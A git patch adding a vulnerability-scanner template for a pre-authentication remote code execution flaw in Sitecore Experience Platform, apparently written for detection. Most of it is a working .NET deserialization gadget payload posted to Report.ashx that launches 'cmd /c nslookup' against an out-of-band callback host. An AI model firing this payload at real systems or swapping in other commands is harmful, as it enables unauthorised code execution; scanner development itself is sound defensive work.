From c06cc9f6900304afa5bf3673b7add344fdac07fe Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Wed, 3 Nov 2021 16:52:25 +0530
Subject: [PATCH] Added Sitecore Experience Platform Pre-Auth RCE

---
 vulnerabilities/sitecore-pre-auth-rce.yaml | 104 +++++++++++++++++++++
 1 file changed, 104 insertions(+)
 create mode 100644 vulnerabilities/sitecore-pre-auth-rce.yaml

diff --git a/vulnerabilities/sitecore-pre-auth-rce.yaml b/vulnerabilities/sitecore-pre-auth-rce.yaml
new file mode 100644
index 0000000000..940242ff05
--- /dev/null
+++ b/vulnerabilities/sitecore-pre-auth-rce.yaml
@@ -0,0 +1,104 @@
+id: sitecore-pre-auth-rce
+
+info:
+  name: Sitecore Experience Platform Pre-Auth RCE
+  author: pdteam
+  severity: critical
+  description: This issue is related to a remote code execution vulnerability through insecure deserialization in the Report.ashx file. This file was used to drive the Executive Insight Dashboard (of Silverlight report) that was deprecated in 8.0 Initial Release.
+  tags: rce,sitecore,deserialization,oast
+  reference:
+    - https://blog.assetnote.io/2021/11/02/sitecore-rce/
+    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
+
+requests:
+  - raw:
+      - |
+        POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version="1.0" ?>
+        <a>
+            <query></query>
+            <source>foo</source>
+            <parameters>
+                <parameter name="">
+                    <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
+                        xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
+                        xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
+                        xmlns:x="http://www.w3.org/2001/XMLSchema"
+                        xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
+                        <Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
+                            xmlns="">2</Count>
+                        <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
+                            xmlns="">
+                            <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
+                                xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
+                                xmlns:a="http://schemas.datacontract.org/2004/07/System">
+                                <Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
+                                    xmlns="">
+                                    <a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
+                                    <a:delegateEntry z:Id="7">
+                                        <a:assembly z:Ref="6" i:nil="true"/>
+                                        <a:delegateEntry i:nil="true"/>
+                                        <a:methodName z:Id="8">Compare</a:methodName>
+                                        <a:target i:nil="true"/>
+                                        <a:targetTypeAssembly z:Ref="6" i:nil="true"/>
+                                        <a:targetTypeName z:Id="9">System.String</a:targetTypeName>
+                                        <a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
+                                    </a:delegateEntry>
+                                    <a:methodName z:Id="11">Start</a:methodName>
+                                    <a:target i:nil="true"/>
+                                    <a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
+                                    <a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
+                                    <a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
+                                </Delegate>
+                                <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
+                                    xmlns=""
+                                    xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
+                                    <Name z:Ref="11" i:nil="true"/>
+                                    <AssemblyName z:Ref="12" i:nil="true"/>
+                                    <ClassName z:Ref="13" i:nil="true"/>
+                                    <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
+                                    <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
+                                    <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
+                                    <GenericArguments i:nil="true"/>
+                                </method0>
+                                <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
+                                    xmlns=""
+                                    xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
+                                    <Name z:Ref="8" i:nil="true"/>
+                                    <AssemblyName z:Ref="6" i:nil="true"/>
+                                    <ClassName z:Ref="9" i:nil="true"/>
+                                    <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
+                                    <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
+                                    <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
+                                    <GenericArguments i:nil="true"/>
+                                </method1>
+                            </_comparison>
+                        </Comparer>
+                        <Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
+                            xmlns="">2</Version>
+                        <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
+                            xmlns="">
+                            <string z:Id="25"
+                                xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
+                            <string z:Id="26"
+                                xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
+                        </Items>
+                    </ArrayOfstring>
+                </parameter>
+            </parameters>
+        </a>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "System.ArgumentNullException"
\ No newline at end of file